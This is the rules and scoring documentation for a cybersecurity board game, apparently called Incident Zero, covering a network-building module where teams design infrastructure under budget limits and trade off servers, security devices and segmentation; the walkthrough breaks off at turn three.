Key Concept: Architecture decisions create vulnerabilities that are discovered during investigations and audits. Bad decisions made here cost more money later.

Module Teaches: - Primary: Network architecture, infrastructure design, security trade-offs - Secondary: Budget prioritization, business vs. security balance, intentional/accidental vulnerabilities

Integration Point: - Network Building can be played standalone OR as setup for Incident Response/Hardening/Disaster Recovery modules - When combined with other modules, the network design created here becomes the context for those modules (see module-combinations.md)


Module Setup (15-20 minutes)

1. Choose Difficulty Level

Difficulty Budget Recommended Use
Beginner 60 Learning networks; roomier budget, easier trade-offs
Standard 50 Balanced play, typical scenario
Advanced 40 Tight budget; hard trade-offs, strategic depth

Budget represents: Time, money, and resources for infrastructure design

(v2.2) More budget = easier. Beginner gets the most budget; Advanced gets the least.

2. Starting Scenario

Narrative Framing:

"Your organization is building or rebuilding its IT infrastructure. You have limited budget and must support 500 employees with core business functions. Every decision will affect your security posture when this network is tested. Make smart trade-offs."

Key Point: Teams don't know yet which decisions will matter most. Some budget is "wasted" on nice-to-haves, some on security that (hopefully) won't be needed.

3. Available Network Components

Components fall into 5 categories:

Category 1: Server Types

Server Type Cost Capacity Function Security Notes
Email Server 8 1 Email system Internet-facing; phishing target
Web Server 7 1 Public website Internet-facing; exploit target
Database Server 10 1 Customer data High-value target; access control critical
File Server 6 2 File storage Often over-privileged; lateral movement point
Domain Controller 12 2 User identity (AD/Kerberos) Critical; full compromise if breached
Development Server 5 3 Dev/testing environment Weak security; staging ground for attacks
Backup Server 9 1 Data backup Should be isolated; ransomware recovery
Cloud Workload 4 2 General cloud compute Less control; API/credential exposure
Legacy System 3 1 Old/unmaintained system High exploitability; hard to patch
Honeypot Decoy 7 1 Detection trap Detects attackers; wastes attacker time

Capacity Rules: - Each server can host a certain number of services (shown in Capacity column) - Services = business functions (email, web, database, identity, file storage, etc.) - Can OVERLOAD a server (put more services than capacity allows) to save budget, but creates risk

Category 2: Security Devices

Device Type Cost Function Gameplay Effect
Firewall 12 Perimeter defense Blocks traffic between network zones
Intrusion Detection (IDS) 10 Network monitoring Detects lateral movement (+1 investigation modifier in IR)
Intrusion Prevention (IPS) 14 Network blocking Blocks exploits passively
Load Balancer 8 Traffic distribution Improves availability without extra capacity
VPN Gateway 9 Remote access Enables secure remote work; attack surface if weak
Email Gateway 6 Email filtering Stops phishing; reduces SOCIAL_ENGINEERING risk
Web Application Firewall (WAF) 11 App-level defense Protects web servers from app attacks
Network Segmentation Switch 10 Microsegmentation Creates isolated network zones
SIEM System 15 Centralized logging Logs everything; helps IR investigations (+1 to Investigate in IR module)
Honeypot Network 8 Detection Detects lateral movement; wastes attacker time

Category 3: Network Architecture Decisions

How servers are logically organized and connected:

Decision Cost Security Impact Notes
Flat Network 0 No segmentation All servers on same network; vulnerable but simple
Segmented Network (3 zones) 5 Basic isolation Separate DMZ, Internal, Sensitive zones
Fully Isolated (multiple firewalls) 12 Strong isolation Each zone protected; expensive but resilient
Cloud Hybrid (on-prem + cloud) 8 Complex Adds cloud security considerations
Cloud First (mostly cloud) 6 Different attack surface Less on-prem; more cloud API risk

Architecture decisions are NON-NEGOTIABLE - teams must pick one to organize their network.

Category 4: Business Requirements (v2.2)

Teams MUST satisfy every Required item by end of game. Recommended items are not mandatory, but skipping one is recorded as a gap (and costs points at scoring).

Requirement Status Satisfied By Notes
Email Required Email Server, OR hosted on a Cloud Workload Non-negotiable
Web Presence Required Web Server, OR hosted on a Cloud Workload Online business
Customer Database Required Database Server, OR hosted on a Cloud Workload Cloud-hosting the crown jewels is a recorded risk
User Identity (AD/Kerberos) Required Domain Controller No substitute
Disaster Recovery (Backup) Required (v2.2) Backup Server No backup = automatic FAIL on this requirement, recorded as a CRITICAL gap (not an instant game loss)
File Storage Recommended (v2.2) File Server, OR spare capacity/overload on another server Gap if missing
Development/Testing Recommended (v2.2) Dev Server, OR overload another server Overloading a server for dev is explicitly allowed
Remote Work VPN Recommended (v2.2) VPN Gateway Gap if missing: risky remote-access workarounds

Key Rule: Required items are fixed. Teams must find places to host them, even if it means cloud-hosting or overloading servers.

Affordability Check (v2.2) — the Required list fits every difficulty:

Category 5: Hosting Model

Physical location of infrastructure:

Model Cost Notes
Self-Hosted (On-Premises) 0 Team controls; responsibility for patching
Cloud-Hosted (AWS/Azure/GCP) 0 Provider controls; less direct control
Hybrid 0 Mix of on-prem and cloud; complex

Gameplay Loop (15-20 minutes)

Turn Structure (v2.2)

Teams take 5 "Build Turns" (~3-4 minutes each to discuss and decide).

Each turn is a design-review phase (v2.2): the team may take any number of actions — place as many components as they can afford — before ending the turn. Turns are not a one-purchase limit; they are checkpoints where the design gets stress-tested.

Between turns, the Threat Orchestrator reveals a development: draw one Operational Event or Business Requirement card from the standalone decks (cards/network-building/standalone/), or narrate one (a stakeholder demand, a vendor issue, a budget change). This gives teams a reason to revisit the design each turn.

Available actions:

Action 1: Place a Server

Cost: Server cost (3-12 Budget) Effect: Add server to infrastructure

How It Works: 1. Choose a server card 2. Decide which business services it will host 3. Pay the cost 4. Track remaining budget

Example: "We're placing a Domain Controller on-premises (12 Budget). It will host user identity, with a spare capacity slot for file storage. Remaining budget: 38."

Constraints: - Duplicates allowed (v2.2): you may deploy more than one server of the same type; each copy costs full price - Can't host a required service on a server that doesn't exist - Can OVERLOAD servers (see Overload Mechanic below)


Action 2: Add Security Device

Cost: Device cost (6-15 Budget) Effect: Add network defense or monitoring

How It Works: 1. Choose a security device card 2. Describe which servers/zones it protects 3. Pay the cost 4. Track placement on network diagram

Example Turn: "We're deploying a Firewall between our DMZ and Internal network (12 Budget). This blocks unauthorized traffic between zones. Remaining budget: 26."


Action 3: Implement Network Architecture

Cost: Architecture cost (0-12 Budget) Effect: Determine how servers logically connect

How It Works: 1. Choose one architecture type (only ONE per game) 2. Describe zone organization 3. Pay the cost 4. Document on network diagram

Example Turn: "We're implementing a Segmented Network with 3 zones (5 Budget): - DMZ: Email and Web servers (internet-facing) - Internal: File servers and user workstations - Sensitive: Database and Domain Controller Remaining budget: 21."


Action 4: Choose Hosting Model

Cost: Usually 0 (some cloud strategies cost money) Effect: Determines where infrastructure physically lives

How It Works: 1. Decide on hosting strategy 2. Apply to appropriate servers 3. Document on infrastructure card 4. Pay if cloud-specific (usually free)

Example Turn: "We're hosting our email and web servers on AWS (0 cost). Domain Controller stays on-premises. This reduces on-prem complexity but adds cloud management responsibility."


Action 5: End Turn / Pass

Cost: 0 Effect: Take no further actions this turn; preserve budget

Use When: Satisfied with current design or holding budget in reserve for surprises


The Overload Mechanic

Strategic Tradeoff: Cost vs. Risk

Problem: Limited budget + mandatory services = imperfect solutions

Solution: Overload servers (put more services on one server than intended)

How It Works (v2.2): - If a server has capacity for 2 services, you can put 3+ on it - Cost: +1 Budget per extra service beyond capacity (paid when the service is added) - Benefit: Still far cheaper than buying another server - Risk: Overloaded server is harder to isolate; compromise affects multiple services

Example Scenario: "Budget remaining: 5. Still need to host Development Services.

Option A: Buy Dev Server for 5 (leaves 0 budget) Option B: Put Dev on our File Server, which already hosts File Storage and Email Backup (2/2). Overload by 1: pay 1 Budget (leaves 4)

We choose B: File Server becomes (File Storage, Email Backup, Dev Services — OVERLOADED 3/2)"

Consequences (Discovered Later): - Overloaded servers are easier to pivot from (when other modules investigate) - If one service is compromised, ALL services on that server are at risk - Recovery is harder (can't isolate just the compromised service)


Vulnerability Gaps (Intentional and Accidental)

How Budget Constraints Create Gaps

Teams inevitably leave security gaps:

Gap Type How It Happens Cost Saved Later Consequence
No Segmentation Too expensive (5-12) 5-12 All servers accessible after initial compromise
No Firewall Too expensive (12) 12 Can't enforce zone boundaries
Legacy Systems Cheap (3) 7+ Easy to exploit; unpatched vulnerabilities
Overloaded Servers Budget pressure 2-11 (server cost minus overload fees) Multi-service compromise; hard to isolate
No Detection (no IDS/SIEM) Expensive (10-15) 10-15 Attacks undetected; investigations harder
No Email Gateway Phishing defense (6) 6 Phishing easier in IR module
No Honeypot Luxury item (7) 7 Attackers move silently
All Cloud or All On-Prem Simplicity 0 Security model doesn't fit actual architecture
No Backup Server Expensive (9) 9 Automatic FAIL on the Disaster Recovery requirement
No SIEM Most expensive (15) 15 Investigation takes longer

Key Insight: These gaps are discovered when other modules test the network (Audit, Incident Response, Disaster Recovery).


Final Infrastructure Summary

After Building Complete

Teams create an Infrastructure Summary Card:

YOUR NETWORK ARCHITECTURE (Standard, 50 Budget)

SERVERS DEPLOYED:
- Cloud Workload (AWS) - Hosts: Email + Web (2/2, cloud-hosted)
- Database Server (On-Prem) - Hosts: Customer Database
- Domain Controller (On-Prem) - Hosts: Identity, File Storage,
  Dev Services (OVERLOADED 3/2, +1 Budget paid)
- Backup Server (On-Prem, isolated) - Hosts: Backups / DR

ARCHITECTURE: Segmented (3 zones)
- DMZ: (cloud workload fronts the internet)
- Internal: Users
- Sensitive: Database, Domain Controller, Backup Server

SECURITY DEVICES:
- Email Gateway (incoming mail)
- NO Firewall, NO IDS/SIEM, NO VPN Gateway, NO Honeypot

HOSTING: Hybrid (cloud front end, on-prem crown jewels)

BUDGET SPENT: 47/50 (3 remaining)
- Cloud Workload 4 + Database 10 + Domain Controller 12 + Backup 9
  + Segmented Architecture 5 + Email Gateway 6 + Overload 1 = 47

IDENTIFIED GAPS (for other modules):
- Overloaded Domain Controller (identity + files + dev on one box)
- No IDS/SIEM (attacks undetected; investigations harder)
- No VPN Gateway (remote workers use risky workarounds)
- Email and Web share one cloud workload (single point of failure)

Scoring & Network Assessment

Infrastructure Quality Score (v2.2)

After building, teams receive a score reflecting their design choices:

Metric Score
Requirements +2 per Required item satisfied (Email, Web, Database, Identity, Backup) — max +10
Segmentation Implemented Segmented or Fully Isolated architecture = +10
Detection Deployed IDS, IPS, or SIEM = +5
Recovery Deployed Backup Server = +5
Redundancy Duplicated a critical server or deployed a Load Balancer = +5
Contingency Reserve 5-15 Budget remaining = +5; 1-4 remaining = +2; 0 or 16+ remaining = 0

Maximum: 40 points. The reserve bonus rewards smart utilization — meet the requirements and keep a small cushion; hoarding budget scores nothing.

Example Scoring (the sample network above, Standard 50): - All 5 Required items satisfied: +10 - Segmentation implemented: +10 - No IDS/IPS/SIEM: 0 - Backup Server deployed: +5 - No redundancy: 0 - 3 Budget remaining: +2 - Total: 27 points — Good design

Interpretation Tiers (v2.2): - 32-40 points: Enterprise-grade design; comprehensive protection - 22-31 points: Good design; most critical gaps covered - 12-21 points: Adequate design; some gaps remain - Below 12 points: High risk; many gaps; future modules will be challenging

Reachability check: at Beginner (60), a team can score the full 40 — e.g., Cloud Workload 4 (Email+Web) + Database 10 + Domain Controller 12 (Identity + File) + Backup 9 + Segmented 5 + IDS 10 + second Cloud Workload 4 (redundant web) = 54 spent, 6 remaining → 10+10+5+5+5+5 = 40.

Gap Registry

For use in Incident Response and Audit modules: - List all identified gaps - Note severity (CRITICAL, HIGH, MEDIUM, LOW) - These gaps become modifiers when other modules test the network


Integration with Other Modules

Using Network Building as Context

When Network Building leads to other modules:

→ Incident Response Module: - Network design determines which attacks are possible - Overloaded servers make lateral movement easier - Missing IDS/SIEM makes investigation harder

→ Hardening Module: - Teams can see which network gaps they should fix - Fixing a gap they identified = +2 bonus to that defense

→ Disaster Recovery Module: - Network gaps increase crisis budget costs - Overloaded servers = more data compromised - No backup = no recovery option

→ Audit & Compliance Module: - Pre-built network is audited against NIST/CIS - Audit findings highlight network gaps - Findings become modifiers in Incident Response


Tips for Threat Orchestrators

Before the Game

  1. Clarify business requirements - Teams must provide email, web, database, identity, and backup (file storage, dev, and VPN are recommended)
  2. Show budget constraints - 50 Budget is tight; teams will make difficult choices
  3. Emphasize consequences - Choices made here affect all future modules
  4. Prepare Infrastructure Card template - For documenting final network

During Gameplay

  1. Ask clarifying questions - "Why are you putting those two services together?"
  2. Point out overloads - Track when servers exceed capacity
  3. Keep budget visible - Announce remaining budget after each action
  4. Suggest trade-offs - Help teams think through cost-benefit decisions

After Building Complete

  1. Document gaps - List all identified vulnerabilities
  2. Score the network - Tell them how good/risky their design is
  3. Prepare for next module - If continuing to Audit or IR, this network is the context
  4. Celebrate trade-offs - "You saved budget on IPS, but web exploits will be riskier"

Sample Scenarios

Scenario 1: "Startup Network" (Advanced, 40 Budget)

Constraint: Very limited budget; must make hard choices

Starting Narrative: "You're a startup with limited funding. You need to build infrastructure but can't afford everything. Choose wisely."

Likely Outcome: - Flat network (save 5) - Few security devices - Multiple overloaded servers - High vulnerability; good learning about consequences


Scenario 2: "Mid-Market Expansion" (Standard, 50 Budget)

Constraint: Moderate budget; can afford some security

Starting Narrative: "Your organization is growing. You have some budget for infrastructure but not unlimited. Balance growth with security."

Likely Outcome: - Segmented network - Basic security devices (firewall, email gateway, IDS or SIEM) - Some overloading but manageable - Moderate vulnerability; balanced design


Scenario 3: "Enterprise Hardening" (Beginner, 60 Budget)

Constraint: Good budget; comprehensive design possible

Starting Narrative: "You're rebuilding infrastructure with sufficient budget. Design for security AND resilience."

Likely Outcome: - Segmented or isolated network - Multiple security devices - Minimal overloading - Good security posture; few gaps


Extensions & Variations

Variation 1: Regulatory Compliance

Add compliance requirements: - NIST CSF, CIS Controls, PCI-DSS, HIPAA - Teams must choose devices that satisfy compliance - Some devices count toward multiple requirements


Variation 2: Business Department Negotiation

Assign roles: - Finance wants cheap solutions - Operations wants reliability - Security wants defense-in-depth - Teams must negotiate trade-offs


Variation 3: Network Redesign

After Incident Response or Disaster Recovery: - Teams rebuild network based on lessons learned - Compare new design to original - Measure improvement


Quick Reference: Component Costs

Component Cost Notes
Servers 3-12 Higher cost = more critical function
Devices 6-15 Higher cost = more capability
Architecture 0-12 One per game; segmented is best balance
Hosting 0-8 Usually free; some cloud options cost

Need Help?


v2.2 Playtest Edition Changes

Summary of rule changes for playtesters (all labelled "(v2.2)" in the text above):

  1. Difficulty direction fixed: more budget = easier. Beginner 60 / Standard 50 / Advanced 40 (previously Beginner had the least budget).
  2. Action economy fixed: each Build Turn, teams may place any number of components they can afford. Turns are design-review checkpoints; between turns the TO reveals an Operational Event or Business Requirement (see the standalone decks in cards/network-building/standalone/). Previously 5 turns × 1 action made the mandatory requirements physically impossible to place.
  3. Requirement list rebalanced: Required = Email, Web, Database, Identity, Disaster Recovery (Backup). Recommended = File Storage, Development, Remote Work VPN. Backup is now Required (missing backup = automatic FAIL on that requirement, not an instant game loss). Development is Recommended and may be hosted by overloading. Email/Web/Database may be cloud-hosted on Cloud Workloads, which keeps the Required list affordable even at Advanced (40): dedicated build = 46; cloud-assisted builds = 35 or 29.
  4. Overload now costs +1 Budget per extra service beyond capacity (was free). Matches the standalone game.
  5. Duplication rule: multiple servers of the same type are allowed; each costs full price (replaces the old vacuous "unless you have the budget for both" wording).
  6. Scoring rescaled: new Requirements metric (+2 each, max 10), Contingency Reserve bonus (+5 for finishing with 5-15 Budget — smart utilization, not hoarding), and tiers rescaled to reachable bands (32-40 / 22-31 / 12-21 / <12). Max score 40 is verified reachable at Beginner.
  7. Terminology unified: "VPN Gateway" (was VPN Concentrator) and "Backup Server" (was Backup System) everywhere.
  8. Examples corrected: the sample Infrastructure Summary and all in-text budget arithmetic now add up.

Network Building Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/network-building.md

Incident Zero: Network Building Standalone Mini-Game

Infrastructure Design Competition

Version: 2.2 - Playtest Edition Last Updated: July 2026


Overview

Network Building Standalone is a 30-45 minute competitive resource management game where teams design IT infrastructure under budget constraints with random business requirements and operational challenges.

Core Concept: - Budget: Limited funding (40-60 Network Budget tokens by difficulty; 50 standard) - Requirements: Random business needs forcing tough trade-offs - Randomness: Equipment failures, budget surprises, requirement changes - Scoring: Multi-dimensional (security, budget efficiency, capability, resilience) - Winner: Team with highest final score

Best For: - Teaching infrastructure trade-offs - Understanding security budget constraints - Decision-making under uncertainty - Standalone 30-45 minute session - Competitive team play (2-4 teams)


Win Condition & Game Length

Turns & Time

Game Duration: 5-7 turns (by difficulty) × 4-5 minutes per turn = 20-30 minutes gameplay - Setup: 5 minutes (explain rules, distribute materials) - Gameplay: 20-30 minutes - Scoring & Debrief: 5-10 minutes - Total: 30-45 minutes

Each turn represents ~1 quarter of the fiscal year: - Reveal a Business Requirement (what does the business need this quarter?) - Reveal an Operational Event (failure, budget change, attack, opportunity) - Team deploys components, handles the event, or passes


Game Components

Network Budget Tokens

Component Cards

SERVER CARDS (print from cards/network-building/core-deck/server-cards.md)

Each has: Type, Cost, Capacity, Security Profile

┌──────────────────────┐
│ EMAIL SERVER         │
│ Cost: 8              │
│ Capacity: 1 service  │
│ Security: Low        │
│ (Phishing target)    │
└──────────────────────┘

Server Types Available: - Email Server (8 Budget, 1 capacity, Low security) - Web Server (7 Budget, 1 capacity, Low security) - Database Server (10 Budget, 1 capacity, Medium security) - File Server (6 Budget, 2 capacity, Low security) - Domain Controller (12 Budget, 2 capacity, Medium security) - Development Server (5 Budget, 3 capacity, Low security) - Backup Server (9 Budget, 1 capacity, High security) - Cloud Workload (4 Budget, 2 capacity, Medium security) - Legacy System (3 Budget, 1 capacity, Very Low security) - Honeypot Decoy (7 Budget, 1 capacity, Medium security)

Overload rule: a server may host more services than its capacity for +1 Budget per extra service — but overloaded servers are a recorded risk (see Variations, now a standard rule).

SECURITY DEVICE CARDS (print from cards/network-building/core-deck/security-device-cards.md)

Each has: Type, Cost, Benefit

┌──────────────────────┐
│ FIREWALL             │
│ Cost: 12             │
│ Blocks traffic       │
│ between network      │
│ zones (segmentation) │
└──────────────────────┘

Security Device Types Available (v2.2 — benefits stated in plain language; the Scoring section says what each counts as): - Firewall (12 Budget) — blocks traffic between network zones; counts as Firewall and toward segmentation - IDS (10 Budget) — spots attacks in progress; counts as detection - IPS (14 Budget) — blocks known exploits in real time; counts as detection - Email Gateway (6 Budget) — filters phishing and email malware - WAF (11 Budget) — protects web applications from injection/XSS attacks - SIEM (15 Budget) — central logging and alerting; counts as detection, helps audits - Network Segmentation Switch (10 Budget) — isolates network zones; counts as segmentation - VPN Gateway (9 Budget) — secure remote access for staff - Load Balancer (8 Budget) — spreads load across duplicated services; counts as redundancy - Honeypot Network (8 Budget) — decoy segment that exposes intruders; counts as detection

BUSINESS REQUIREMENT CARDS (print from cards/network-building/standalone/business-requirement-cards.md)

20 cards (REQ-01 to REQ-20) of random quarterly business needs. Each names the requirement, what satisfies it, and the score impact.

┌──────────────────────┐
│ BUSINESS REQUIREMENT │
├──────────────────────┤
│ REQ-01: "New Product │
│ Launch Website"      │
│                      │
│ Satisfied by: Web    │
│ Server or cloud web  │
│                      │
│ Missed: -5 points    │
└──────────────────────┘

OPERATIONAL EVENT CARDS (print from cards/network-building/standalone/operational-event-cards.md)

16 cards (EVT-01 to EVT-16) of random incidents, opportunities, and challenges. Each states its effect and which designs mitigate it.

┌──────────────────────┐
│ OPERATIONAL EVENT    │
├──────────────────────┤
│ EVT-01: "Email       │
│ Server Failure"      │
│                      │
│ Pay 5 Budget to fix  │
│ OR -10 points        │
│                      │
│ Mitigated by:        │
│ redundant/cloud email│
└──────────────────────┘

Game Setup (5 minutes)

1. Explain Scoring System

Final Score = Security Score + Budget Score + Capability Score + Resilience Score − Requirement/Event penalties (+ bonuses)

Teams win by maximizing total score, not just saving budget.

2. Distribute Starting Materials

Each Team Receives: - Starting Budget: 50 Network Budget tokens (Standard difficulty) - Infrastructure Summary Sheet (to track what they've built) - Score Tracking Sheet - Network Diagram Worksheet (optional, for visualization)

3. Create Card Decks

Shuffle and place face-down: - Business Requirement deck (all 20 cards; 1 drawn per turn) - Operational Event deck (all 16 cards; 1 drawn per turn)

4. Brief Teams

**"You're a CIO designing your organization's IT infrastructure for the next 18 months. You have limited budget ($50K, represented as 50 tokens). Each quarter brings new business requirements and operational challenges. You must balance: - Getting the work done (business requirements) - Keeping things secure (security devices) - Managing money (budget efficiency) - Surviving incidents (resilience features)

After 6 quarters (turns), we'll score your infrastructure. Highest score wins."**


Turn Structure (4-5 minutes per turn)

Each Turn Has 4 Phases

Phase 1: Reveal Business Requirement (1 minute)

Threat Orchestrator flips top Business Requirement Card:

"It's Q2. The executive team wants to acquire a customer database company. You need to integrate their 2 million customer records into your infrastructure. You MUST have a functioning Database Server by end of Q2 or you lose 10 points (deal falls through)."

Team Notes: - What service is needed? - When is the deadline? (end of this turn unless the card says otherwise) - What's the penalty if you skip? (points deduction)

Teams Discuss: Do we have it? If not, how do we get it?

Phase 2: Reveal Operational Event (1 minute)

Threat Orchestrator flips top Operational Event Card:

"OPERATIONAL EVENT: Your Email Server just failed. It's been down for 2 hours. You can: - Option A: Pay 5 budget for emergency repair (get email back online) - Option B: Skip repair (email stays down all quarter) - lose 10 points (users upset, productivity down) - Option C: Use this as an excuse to upgrade (replace with new server, normal cost)"

Teams Decide: How to handle the incident?

Phase 3: Team Actions (2-3 minutes) (v2.2)

Teams may take ANY NUMBER of the following actions, in any order, limited only by budget (previously one action per turn):

Action A: Deploy a Server

Example: "We're deploying a Database Server on-premises. Cost: 10 budget. Remaining: 40 budget. This satisfies the Q2 acquisition requirement. No penalty!"

Action B: Deploy a Security Device

Example: "We're deploying an IDS on our internal network. Cost: 10 budget. Remaining: 30 budget. That gives us detection — if a ransomware or insider event comes up, we're covered."

Action C: Handle Operational Event

Example: "Email Server failed. We're paying 5 budget for emergency repair. That lets us avoid the -10 penalty. Remaining: 25 budget."

Action D: Pass

Phase 4: End of Turn Accounting (30 seconds)

Update Trackers: - Subtract budget spent - Mark servers/devices deployed - Apply any penalties from unmet requirements - Prepare for next turn

Next Turn Begins


Scoring System

Scoring Dimensions

Final Score = Security + Budget + Capability + Resilience − requirement/event penalties (+ bonuses)

Requirement and event penalties/bonuses (from the cards) are tracked as they happen and applied to the final total. Dimension scores can go negative.

1. SECURITY SCORE (0-30 points)

Measures defensive capability against attacks

Security Metric Points How Scored
IDS or IPS Deployed +5 Detect/prevent network attacks
SIEM Deployed +5 Centralized logging & detection
Firewall Deployed +4 Perimeter / zone enforcement
Backup Server Deployed +4 Ransomware recovery
Email Gateway Deployed +3 Phishing protection
WAF Deployed +3 Web application protection
Honeypot Deployed +3 Early warning system
Network Segmentation +3 Lateral movement prevention (Segmentation Switch or segmented architecture)

Maximum Security Score: 30 points (5+5+4+4+3+3+3+3 = 30)

Examples: - Only Email Gateway: 3 points (basic phishing defense, weak) - IDS + SIEM + Email Gateway: 13 points (good detection) - Full suite (IDS + SIEM + Firewall + Backup + Email Gateway + WAF + Honeypot + Segmentation): 30 points (enterprise-grade, but expensive)

2. BUDGET SCORE (0-20 points) (v2.2)

Rewards smart utilization: meeting the business's needs within budget while keeping a small contingency reserve. Hoarding budget is NOT rewarded — an unspent token did no work.

Budget Remaining at Game End → Points:

Budget Remaining Points Reading
5-15 left 20 Requirements met, plus a contingency reserve for surprises
1-4 left 15 Fully invested, but nothing left for the next incident
0 left 10 Ran completely dry
16-25 left 10 Under-invested; capability probably missing
26+ left 5 Hoarding — budget is not the goal

Anti-hoarding check: if the team missed 2 or more Business Requirements during the game, halve their Budget Score (round down). Saving money by failing the business is not efficiency.

Examples: - Spent 42, left 8: 20 points (met needs, kept a reserve) - Spent 46, left 4: 15 points (all-in; one bad event from trouble) - Spent 20, left 30: 5 points (a pile of tokens and a network full of gaps)

3. CAPABILITY SCORE (0-25 points)

Does infrastructure meet business needs?

Capability Points Notes
Email Service +3 Basic business function (Email Server or cloud-hosted)
Web Service +3 Public presence / e-commerce
Database Service +4 High-value data management
File Storage +2 Internal collaboration
Domain Controller +3 User identity & security
Development Capability +2 Dev Server or dev via overload
Backup Server +3 Disaster recovery
Remote Access (VPN Gateway) +2 Work-from-home support
Cloud Workload +2 Scalability & redundancy
Honeypot +1 Early-warning capability

Maximum Capability Score: 25 points (3+3+4+2+3+2+3+2+2+1 = 25)

Penalties for Missing Key Services: - No Email service: -5 (business can't communicate) - No Database service: -10 (core data has no home) - No Domain Controller: -3 (no central identity) - No VPN Gateway (only if a remote-work requirement card was drawn): -3

(Ransomware consequences for missing backups come from the event cards themselves — see EVT-11.)

Examples: - Email, Web, Database, File, Domain Controller, Backup: 3+3+4+2+3+3 = 18 points (good) - The same plus VPN Gateway and a Honeypot: 18+2+1 = 21 points (excellent) - Email, Web, File, Domain, Backup but NO Database: 3+3+2+3+3 = 14, minus 10 = 4 points (the penalty bites)

4. RESILIENCE SCORE (0-25 points)

Ability to survive and recover from failures

Resilience Factors:

Factor Points Criteria
Backup Server +8 Can recover from ransomware/data loss
Detection +7 IDS/IPS/SIEM can spot attacks early
Redundancy +5 Duplicate server in the same role OR Load Balancer
Isolation +3 Network segmentation prevents spread
Recovery Plan +2 Has BOTH Backup Server and detection

Maximum Resilience Score: 25 points (8+7+5+3+2 = 25)

Penalties for Vulnerabilities (v2.2): - No Backup Server: -10 (one disaster from catastrophe) - Single point of failure (all critical services on one server): -5 - No detection capability: -3 - Flat network (no segmentation): -2

Examples: - Backup + Detection + Segmentation + Redundancy: 8+7+3+5, +2 recovery plan = 25 points (maximum; very resilient) - Backup + Detection, flat network, no redundancy: 8+7+2−2 = 15 points (adequate) - No backup, no detection, flat network: −10−3−2 = −15 points (high risk; yes, scores go negative)


Final Scoring Example

Team A's Infrastructure (resilience-first)

Built (total 46 of 50; 4 remaining): - Email Server (8): handles email - Web Server (7): public website - Database Server (10): customer data - File Server (6): internal files - Backup Server (9): disaster recovery - Email Gateway (6): phishing defense

Check: 8+7+10+6+9+6 = 46 ✓. No Domain Controller (too expensive; skipped for budget). Flat network.

Scoring Team A:

Security Score: - Email Gateway: +3 - Backup Server: +4 - No IDS/IPS/SIEM/Firewall/WAF/Honeypot/Segmentation: 0 - Total: 7 points

Budget Score: - 4 budget remaining → 1-4 band - Total: 15 points

Capability Score: - Email +3, Web +3, Database +4, File +2, Backup +3 = 15 - No Domain Controller: −3 - Total: 12 points

Resilience Score: - Backup Server: +8 - No detection: −3 - Flat network: −2 - Total: 3 points

Team A Final Score: 7 + 15 + 12 + 3 = 37 points


Team B's Infrastructure (security-first, no backup)

Built (total 47 of 50; 3 remaining): - Email Server (8) - Web Server (7) - Database Server (10) - Domain Controller (12) - IDS (10)

Check: 8+7+10+12+10 = 47 ✓. No Backup Server (sacrificed for detection). Flat network.

Scoring Team B:

Security Score: - IDS: +5 - Total: 5 points

Budget Score: - 3 left → 1-4 band - Total: 15 points

Capability Score: - Email +3, Web +3, Database +4, Domain Controller +3 = 13 - Total: 13 points

Resilience Score: - Detection: +7 - No Backup Server: −10 - Flat network: −2 - Total: −5 points (negative!)

Team B Final Score: 5 + 15 + 13 − 5 = 28 points

RESULT: Team A (37) beats Team B (28)

Lesson: Having Backup is critical for resilience, even if it means fewer security devices.


Competitive Play (2-4 Teams)

Setup for Multiple Teams

Each team: - Separate budget (50 tokens each at Standard) - Separate infrastructure tracking sheet - Separate score tracker

Simultaneous Play: - All teams reveal the same requirement and event at the same time - Teams take turns choosing actions (round-robin) OR all teams act simultaneously - Simultaneous is faster; rotating turns allows player agency

Scoreboard

Track all teams' scores throughout game (illustrative):

Team Sec Budget Cap Res TOTAL
Team A 8 20 12 5 45
Team B 12 15 18 10 55
Team C 5 10 8 2 25

Winner: Team with highest total score after the final turn

Tie-Breaking

If two teams tie: 1. First tiebreaker: Security Score (defense is critical) 2. Second tiebreaker: Resilience Score (ability to survive matters) 3. Third tiebreaker: Capability Score (business requirement fulfillment)


Random Elements & Replayability

Requirement & Event Card Variability

Each game is different because:

  1. Card Order Randomized: Shuffle both decks each game — a 5-7 turn game uses only 5-7 of the 20 requirements and 16 events
  2. Card Selection: The Threat Orchestrator may curate the decks (see difficulty options on the card files)
  3. Consequence Ordering: Early disasters force different choices than late surprises

Example Game Flow Variations:

Game 1 (Tough Start): - Turn 1: Ransomware wave (REQ-12) → Must buy Backup + Detection early - Turn 2: Budget cut (EVT-05) → Can't afford nice devices - Turn 3: M&A integration (REQ-08) → Need more capacity - Result: Teams forced into defensive posture

Game 2 (Growth-Focused): - Turn 1: Product launch (REQ-01) → Need Web Server - Turn 2: Data acquisition (REQ-02) → Need Database - Turn 3: Emergency funds (EVT-06) → +10 budget! - Result: Teams build bigger, more capable infrastructure

Difficulty Levels (v2.2 — more budget = easier)

Beginner Mode (Generous): - Starting Budget: 60 - Kind decks (remove EVT-11 and REQ-12 before shuffling) - Turn Limit: 7 (extra time)

Standard Mode: - Starting Budget: 50 - Random card draws - Turn Limit: 6

Advanced Mode (Challenging): - Starting Budget: 40 (tight budget) - Harsh decks (remove EVT-06, EVT-07, EVT-16 — fewer breaks) - Requirement penalties doubled - Turn Limit: 5


Example Full Game Walkthrough (6 Turns, Standard 50)

TURN 1

Phase 1: Business Requirement TO flips card: "New Product Launch Website — need modern web server capability. If missing by end of Q1: -5 points."

Phase 2: Operational Event TO flips card: "Emergency Funds! A surprise rebate arrives. +10 Budget (one time)."

Budget update: 50 + 10 = 60

Phase 3: Team Actions "We're deploying a Web Server to meet the launch requirement. Cost: 7 budget. Remaining: 53. We know we'll need a backup server eventually — holding the rest for now."

Phase 4: End of Turn - Infrastructure: Web Server - Budget: 53


TURN 2

Phase 1: Business Requirement "Customer Data Acquisition — must have a functioning Database by end of Q2 or lose 10 points."

Phase 2: Operational Event "Email Server Failure — pay 5 budget for emergency repair OR skip and lose 10 points."

The team has no email server, so the TO rules the event inert — there's nothing to break. (TO tip: when an event targets a component the team doesn't own, it fizzles — but it's a great moment to point at the capability gap.)

Phase 3: Team Actions "We're deploying a Database Server (10 budget) to handle the acquisition — that's critical. The failure event doesn't apply to us, so no repair cost. Total this turn: 10. Remaining: 43."

Infrastructure: Web Server, Database Server Budget: 43


TURN 3

Phase 1: Business Requirement "Ransomware Wave in Sector — you need Backup AND Detection capability OR lose 20 points."

